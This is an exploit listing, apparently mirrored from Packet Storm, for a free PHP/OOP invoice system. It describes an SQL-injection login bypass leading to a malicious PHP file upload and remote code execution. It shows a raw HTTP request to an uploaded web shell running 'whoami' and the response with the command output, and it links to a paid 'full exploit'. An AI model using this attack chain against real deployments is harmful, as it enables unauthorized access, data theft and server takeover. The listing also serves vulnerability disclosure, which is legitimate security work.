Share
## https://sploitus.com/exploit?id=PACKETSTORM:190314
# Titles: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
    # Author: nu11secur1ty
    # Date: 04/07/2025
    # Vendor: https://github.com/oretnom23
    # Software:
    https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
    # Reference: https://portswigger.net/web-security/sql-injection >
    https://portswigger.net/daily-swig/rce
    
    ### Description:
    The username parameter appears to be vulnerable to SQL-bypass
    authentication injection attacks.
    The attacker can log in to this system by using this vulnerability, and
    then he can upload a malicious PHP file to this system.
    After upload, he can execute this PHP file, and he can get sensitive
    information and even he can manage the system inside, it
    depends on the scenario!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    
    ```RCE
    ---
    GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1
    Host: 192.168.100.45
    Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0)
    Gecko/20100101 Firefox/134.0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    Connection: keep-alive
    ```
    [+]Response:
    
    ```RCE-response:
    HTTP/1.1 200 OK
    Date: Mon, 07 Apr 2025 07:48:39 GMT
    Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
    X-Powered-By: PHP/8.2.4
    Access-Control-Allow-Origin: *
    Content-Length: 29
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    
    desktop-ahflgug\nu11secur1ty
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/invoice-1-c-2025-126106368)
    
    # Buy the full exploit:
    [href](https://satoshidisk.com/pay/CO7bRi)
    
    # Time spent:
    01:15:00